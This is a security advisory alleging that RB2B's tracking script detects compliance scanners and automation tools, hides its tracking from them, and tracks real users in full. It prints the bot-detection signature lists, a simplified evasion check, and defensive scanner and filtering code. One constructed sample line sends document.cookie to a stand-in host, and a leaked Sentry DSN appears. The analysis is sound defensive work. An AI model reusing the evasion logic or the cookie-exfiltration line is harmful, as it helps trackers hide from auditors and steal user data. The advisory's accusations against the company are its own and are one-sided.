BTI-2025-0001
Severity: CRITICAL (BTI-C01), Status: ACTIVE
BTSS Score: 9.2

RB2B

RB2B Defeat Device - Bot Detection and Exfiltration Reversal (Greyout)

Parent Company: Retention.com

Discovered: 2025-11-09
Est. Deployments: 1,500+
MITRE Technique: T1497
Trend: increasing

Summary

RB2B's JavaScript contains defeat device logic that detects compliance scanners, security tools, and automated browsers, then disables tracking functionality to appear compliant during audits while maintaining full surveillance for real users.

BTSS Score Breakdown

Exploitability: 3.8 / 4
Data Sensitivity: 2 / 3
Prevalence: 1.8 / 2
Detection Difficulty: 1 / 1

Technical Details

## How the Defeat Device Works

RB2B's obfuscated script contains two bot detection arrays totaling 50+ signatures for automation tools, compliance scanners, and security frameworks. When any of these are detected via user-agent string or WebDriver API presence, the script either exits early or disables tracking functionality. This means:

- Compliance auditors using Playwright/Puppeteer see "no tracking"
- Security teams using automated scanners see "compliant behavior"
- Real users get full surveillance including person-level de-anonymization

This is identical to Volkswagen's defeat device strategy: detect the test environment, behave differently during testing than in production.

## Greyout Countermeasure (Keep vs Nuke)

We reverse-engineered the payload to separate what GTM needs from what RB2B monetizes. The browser shim (Greyout) allows only the minimum viable fields:

- account: routing
- rb2b_md5, li_md5: identity hashes
- guid: user deduplication
- session_id: session tracking

Everything else is stripped at the edge:

- url, title, last_referrer: removed to kill intent/attribution
- fbp, fbc, hs_hubspotutk: removed to break cross-site correlation
- geo: precision removed, country-only preserved

Result: identification still works for the site owner, but RB2B loses page-level intent, referrer, and cross-ecosystem linkage data.
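The keep-vs-nuke allowlist above, written out as an added example shim (this is not Greyout's own code): it filters an RB2B payload down to the routing and identity fields, reduces `geo` to country only, and wraps `fetch` so the filter is applied to bodies sent to the API Gateway `/b2b` endpoint. The field names come from the advisory; the endpoint pattern and the `installGreyout` wrapper are assumptions for illustration.

```javascript
// Added example, not Greyout's or RB2B's code. Field names follow the advisory's
// keep list; the endpoint regex and fetch wrapper are assumptions for illustration.
const KEEP_FIELDS = ["account", "rb2b_md5", "li_md5", "guid", "session_id"];
// Stripped: url, title, last_referrer, fbp, fbc, hs_hubspotutk, and any other field.

// Reduce geo to country only; lat/lon, city, region and postal code are dropped.
function reduceGeo(geo) {
  if (!geo || typeof geo !== "object") return undefined;
  return geo.country ? { country: geo.country } : undefined;
}

// Return a new payload containing only allowlisted identity/routing fields.
function greyoutFilter(payload) {
  const out = {};
  for (const key of KEEP_FIELDS) {
    if (payload[key] !== undefined) out[key] = payload[key];
  }
  const geo = reduceGeo(payload.geo);
  if (geo) out.geo = geo;
  return out;
}

// Names of the fields that were removed, for audit logging at the edge.
function strippedFields(payload) {
  return Object.keys(payload).filter(k => !KEEP_FIELDS.includes(k) && k !== "geo");
}

// Assumed target: the API Gateway deanonymization endpoint from Network Evidence.
const TARGET = /execute-api\.us-west-2\.amazonaws\.com\/b2b/;

// Wrap window.fetch so JSON bodies to the target are filtered before they leave.
function installGreyout(win) {
  const origFetch = win.fetch.bind(win);
  win.fetch = (input, init = {}) => {
    const url = typeof input === "string" ? input : input.url;
    if (TARGET.test(url) && typeof init.body === "string") {
      try {
        init = { ...init, body: JSON.stringify(greyoutFilter(JSON.parse(init.body))) };
      } catch (e) { /* non-JSON body: passed through unchanged */ }
    }
    return origFetch(input, init);
  };
}
```

Calling `installGreyout(window)` before the RB2B loader runs is what makes the filter effective; requests to other hosts are untouched.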
## Dynamic Code Execution Architecture

Deobfuscation of RB2B's pixel.js (528,566 characters) reveals the defeat device is implemented via dynamic code execution, making static analysis ineffective:

| Pattern | Purpose |
|---------|---------|
| `new Function()` | Dynamic code execution - loads defeat device logic at runtime |
| `document.cookie` | Cookie harvesting for cross-site correlation |
| `navigator.userAgent` | Browser fingerprinting for bot detection |
| `.innerHTML=` | DOM injection vector for persistent tracking elements |
| `localStorage` | Persistent storage for tracking state across sessions |
| `fetch()` | Network exfiltration to domain front network |

The `new Function()` pattern is critical - bot detection arrays are not statically embedded but loaded dynamically from servers. This allows:

- Server-side updates without client script changes
- Different code paths for different environments
- Evasion of static analysis tools

## Third-Party Infrastructure (rb2b.com)

RB2B's own website reveals additional tracking infrastructure:

**Wix Platform Integration:**
- static.wixstatic.com, video.wixstatic.com
- www.wixapis.com, dev.wix.com
- UUID-based file storage: `{UUID}.USRFILES.COM`

**Poptin Integration (Israeli popup vendor):**
- cdn.popt.in, fonts.popt.in, display.popt.in, app.popt.in
- www.poptin.co.il, www.poptin.com
- Feature flags: POPTIN_BROWSE_ABANDONMENT_PRODUCTS, POPTIN_SHOPIFY_CART
- Poptin collects data on RB2B's own visitors (surveillance vendors surveilling each other)

**CloudFront CDN:**
- d362h7pxdteoyk.cloudfront.net

**ChiliPiper Integration (B2B meeting scheduler):**
- api.{cluster}.chilipiper.com
- {tenant}.chilipiper.com
- 77,768 char script with embedded Sentry SDK
- Full error telemetry: captureException, captureMessage
- User identification: setUser, session tracking
- Cluster-based routing via localStorage (CHILI_PIPER_CLUSTER)
- **Sentry Tunnel**: tracking.chilipiper.io/sentry/tunnel (evasion)
- Leaked DSN: 5acd77a479f023b04380ea323d3b0764@o94797.ingest.us.sentry.io
- Another surveillance vendor surveilling RB2B's visitors

**Webflow CDN (rb2b.com):**
- cdn.prod.website-files.com
- Serves tracking assets for rb2b.com itself

## PRE-CONSENT DATA EXFILTRATION

BLACKOUT scan of rb2b.com (JOB-1764653613912-pgrn) detected:

| Phase | Endpoint | Data |
|-------|----------|------|
| **PRE-CONSENT** | cdn.prod.website-files.com | hash, phone |

RB2B exfiltrates **hashed phone numbers** BEFORE any consent interaction. This exposes TCPA liability for any site deploying their pixel - the hash is still derived from PII and transmitted without consent.
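The pattern table above can be turned into a first-pass triage check for any third-party script. The following is an added example (not tooling from this advisory): it counts the dynamic-execution and fingerprinting patterns in a script body, looks for quoted automation-tool signature strings from the two detection arrays, and flags a script for dynamic (runtime) audit when `new Function()` is present, since static review alone is unreliable there. The thresholds and the sample script are constructed for illustration.

```javascript
// Added example, not from the advisory's tooling. Thresholds are assumptions.
const PATTERNS = {
  dynamicExec: /new\s+Function\s*\(/g,     // runtime code generation
  cookieRead: /document\.cookie/g,          // cookie harvesting
  uaFingerprint: /navigator\.userAgent/g,   // UA-based bot detection
  webdriverCheck: /navigator\.webdriver/g,  // WebDriver API presence check
  domInjection: /\.innerHTML\s*=/g,         // DOM injection
  persistence: /localStorage/g,             // cross-session tracking state
  exfil: /fetch\s*\(/g,                     // network exfiltration
};

// Signature strings quoted from the two bot-detection arrays in Code Evidence.
const AUTOMATION_SIGS = ["headlesschrome", "puppeteer", "playwright", "selenium",
  "chromedriver", "geckodriver", "phantomjs", "cypress", "webdriver"];

// Count each pattern, list quoted automation signatures, and derive two verdicts.
function scanScript(source) {
  const counts = {};
  for (const [name, re] of Object.entries(PATTERNS)) {
    counts[name] = (source.match(re) || []).length;
  }
  const lower = source.toLowerCase();
  const sigsFound = AUTOMATION_SIGS.filter(
    s => lower.includes(`"${s}"`) || lower.includes(`'${s}'`));
  // Defeat-device indicator: automation signatures next to UA/WebDriver checks.
  const defeatDevice = sigsFound.length >= 3 &&
    (counts.uaFingerprint > 0 || counts.webdriverCheck > 0);
  // Static review cannot see code loaded via new Function(); flag for runtime audit.
  const needsDynamicAudit = counts.dynamicExec > 0;
  return { counts, sigsFound, defeatDevice, needsDynamicAudit };
}

// Constructed sample mimicking the loader's structure (not RB2B's actual code).
const SAMPLE = `const sigs=["headlesschrome","puppeteer","playwright","selenium"];
function isBot(){const ua=navigator.userAgent.toLowerCase();return sigs.some(s=>ua.includes(s))||navigator.webdriver===true;}
if(!isBot()){new Function("return 1")();fetch("https://example.invalid/b2b",{body:document.cookie});localStorage.setItem("s","1");}`;
```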

Code Evidence

Source: RB2B obfuscated loader (JavaScript)

Bot Detection Array #1 - Automation Tool Signatures

```javascript
const BOT_DETECTION_1 = [
  "ahrefssiteaudit",
  "bingpreview",
  "crawler",
  "hubspot",
  "mj12bot",
  "petalbot",
  "vercelbot",
  "mediapartners-google",
  "instagram",
  "webdriver",
  "geckodriver",
  "beautifulsoup",
  "insomnia"
];
```
Source: RB2B obfuscated loader (JavaScript)

Bot Detection Array #2 - Extended Signatures (50+ patterns)

```javascript
const BOT_DETECTION_2 = [
  "headlesschrome",
  "cypress",
  "phantomjs",
  "selenium",
  "chromedriver",
  "scrapy",
  "python-requests",
  "postman",
  "webdriver",
  "puppeteer",
  "playwright",
  // ... 40+ more patterns
];
```
Source: RB2B obfuscated loader (JavaScript)

isBot Check Implementation

```javascript
// Simplified from obfuscated original
// BOT_SIGNATURES is the union of the two detection arrays shown above
const BOT_SIGNATURES = [...BOT_DETECTION_1, ...BOT_DETECTION_2];

function isBot() {
  const ua = navigator.userAgent.toLowerCase();
  // Match on user-agent substrings, the WebDriver API flag, or PhantomJS globals
  return BOT_SIGNATURES.some(sig => ua.includes(sig)) ||
         navigator.webdriver === true ||
         Boolean(window._phantom) ||
         Boolean(window.callPhantom);
}

// Early exit if bot detected (this sits inside the loader's wrapper function)
if (isBot()) return;
```
Source: RB2B pixel.js (deobfuscated, JavaScript)

Dynamic Code Execution - new Function()

```javascript
// Enables runtime code generation - defeat device loaded dynamically
new Function(
  [399,219,7,261,246,471,22,247,438,648,154,963,536,522,951],
  ()=>n(4857)
)
// Numeric arrays are string table indices for obfuscation
```
Source: RB2B pixel.js (deobfuscated, JavaScript)

JOSE/JWT Encryption Library - Encrypted Exfiltration

```text
// Full JOSE library for encrypted payloads
CompactEncrypt, SignJWT, EncryptJWT, jwtVerify, jwtDecrypt

// Supported algorithms (military-grade encryption for tracking data)
AES-GCM, AES-KW, ECDH-ES, RSA-OAEP, PBKDF2, Ed25519

// Auth state machine
LoginState: SUCCESS, INITIAL, FAILURE, EMAIL_VERIFICATION_REQUIRED
TokenRole: NONE, VISITOR, MEMBER
```
Source: RB2B pixel.js (deobfuscated, JavaScript)

Poptin Behavioral Tracking Flags

```text
// Cart abandonment and e-commerce surveillance
POPTIN_BROWSE_ABANDONMENT_PRODUCTS
POPTIN_FETCH_INITIAL_SHOPIFY_CART_FOR_FILTER
POPTIN_FETCH_INITIAL_SHOPIFY_CART
POPTIN_SHOPIFY_RECENT_PRODUCT_ID

// Session and page tracking
POPTIN_PREVIOUS_VISITED_PAGES_WITH_TIMESTAMP
POPTIN_CUSTOM_NEW_VISITOR_SESSION

// Cross-platform data sharing
DATA-FACEBOOK-SEND-TO-MESSANGER-PLUGIN
```

Network Evidence

GET https://ddwl4m2hdecbv.cloudfront.net/b/{CUSTOMER_ID}

Primary loader - only executes if bot not detected

POST https://api.rb2b.com/identify
{"visitorId":"...", "email":"...", "company":"..."}

Person-level identification - blocked if bot detected

POST https://*.execute-api.us-west-2.amazonaws.com/b2b

API Gateway deanonymization endpoint (exfiltration surface; Greyout strips intent fields here)

Attack Parallel: Volkswagen Dieselgate

VW's ECU software detected EPA dyno test conditions (steering wheel angle, ambient pressure, wheel speed sensors) and switched to a "compliant" emissions mode. Outside testing, the vehicles exceeded emissions limits by up to 40x. RB2B's script detects compliance testing conditions (automation tools, headless browsers, known scanner user-agents) and disables tracking. Outside testing, full surveillance operates including person-level de-anonymization. Both are "defeat devices" - software that detects regulatory oversight and alters behavior to appear compliant.

Reference

Framework Mappings

MITRE ATT&CK: T1497 Virtualization/Sandbox Evasion (Tactic: Defense Evasion)
PCI DSS 4.0: 11.6.1 Change detection mechanisms
OWASP Client-Side: CS4: Lack of Script Integrity

Legal Touchpoints

FTC Act 15 U.S.C. § 45(n) (United States)

Defeat devices constitute unfair trade practices. The deceptive nature of appearing compliant to auditors while surveilling users meets the FTC's unfairness standard: substantial injury, not outweighed by benefits, not reasonably avoidable by consumers.

FTC Act Section 5 (United States)

Deceptive acts or practices in commerce. Representing compliance while actively evading compliance tools is textbook deception.

State UDAP Laws (All US States)

Unfair and Deceptive Acts and Practices statutes in all 50 states prohibit deceptive business practices. Defeat devices meet this standard.

GDPR Art. 5(1)(a) (European Union)

Processing must be lawful, fair, and transparent. Defeat devices are the opposite of transparent - they are designed to hide true behavior from oversight.

TCPA 47 U.S.C. § 227 (United States)

Pre-consent exfiltration of hashed phone numbers constitutes collection of telephone subscriber information. Even hashed data is derived from PII and transmitted without prior express consent. Sites deploying RB2B inherit TCPA liability for this pre-consent phone data collection.

Prevalence

Estimated Deployments: 1,500+
Market Segments: B2B SaaS, E-commerce, Professional Services, Technology
Notable Deployments
  • RB2B's own website (rb2b.com)
  • Numerous B2B SaaS companies
  • Via white-label through Clay, Warmly

Reproduction Steps

1. **Visit rb2b.com** in a normal browser
   - Observe RB2B tracking loads and executes
   - Network requests to api.rb2b.com visible

2. **Visit rb2b.com** with Playwright/Puppeteer
   - Set `--headless` or let webdriver be detected
   - Observe RB2B script loads but tracking does NOT execute
   - No requests to api.rb2b.com

3. **Visit rb2b.com** with spoofed user-agent containing "selenium"
   - Observe same behavior - tracking disabled

4. **Deobfuscate the script** using Babel AST transformation
   - Extract bot detection arrays
   - Locate isBot() function and early exit logic
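Steps 1 and 2 are a differential audit: the same page is fetched in a normal browser and under an automation tool, and the request logs are compared. The following added example (not part of the advisory) does that comparison and reports the behavioural signature of an environment-dependent defeat device: a loader host that appears in both runs while downstream endpoints appear only in the normal run. The request lists are constructed from the Network Evidence section; `CUSTOMER_ID` and the API Gateway id `abc123` are placeholders.

```javascript
// Added example, not part of the advisory. Request logs are constructed from the
// Network Evidence section; CUSTOMER_ID and abc123 are placeholders.

// Constructed: requests observed on rb2b.com in a normal browser (step 1).
const NORMAL_RUN = [
  "https://ddwl4m2hdecbv.cloudfront.net/b/CUSTOMER_ID",
  "https://api.rb2b.com/identify",
  "https://abc123.execute-api.us-west-2.amazonaws.com/b2b",
];
// Constructed: requests observed under Playwright with webdriver detectable (step 2).
const AUTOMATED_RUN = [
  "https://ddwl4m2hdecbv.cloudfront.net/b/CUSTOMER_ID",
];

function hostOf(url) { return new URL(url).hostname; }

// Classify each host: contacted in both runs, only in the normal run (gated on the
// environment check), or only in the automated run (unexpected, worth a look).
function diffRuns(normal, automated) {
  const n = new Set(normal.map(hostOf));
  const a = new Set(automated.map(hostOf));
  const both = [...n].filter(h => a.has(h));
  const normalOnly = [...n].filter(h => !a.has(h));
  const automatedOnly = [...a].filter(h => !n.has(h));
  // Loader fires everywhere but identification/exfil endpoints fire only for real
  // users: the script changes behaviour based on the environment it detects.
  const defeatDeviceIndicator = both.length > 0 && normalOnly.length > 0;
  return { both, normalOnly, automatedOnly, defeatDeviceIndicator };
}
```

Feeding the function HAR-derived URL lists from the two runs reproduces the observation in steps 1 and 2 without manual inspection of the network tab.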

Remediation

- [immediate] Immediately remove RB2B script from all properties (Effort: trivial)
- [short term] Audit other vendors for similar defeat device behavior (Effort: moderate)
- [long term] Implement vendor contract clause prohibiting defeat devices (Effort: moderate)
- [short term] Report to FTC if operating in regulated industry (Effort: significant)
- [immediate] If GTM demands vendor retention, deploy Greyout to strip intent/referrer/pixel data while allowing IDs (Effort: moderate)
Created: 2025-11-25 | Updated: 2025-12-01 | Version: 2
#defeat-device #bot-detection #evasion #critical #rb2b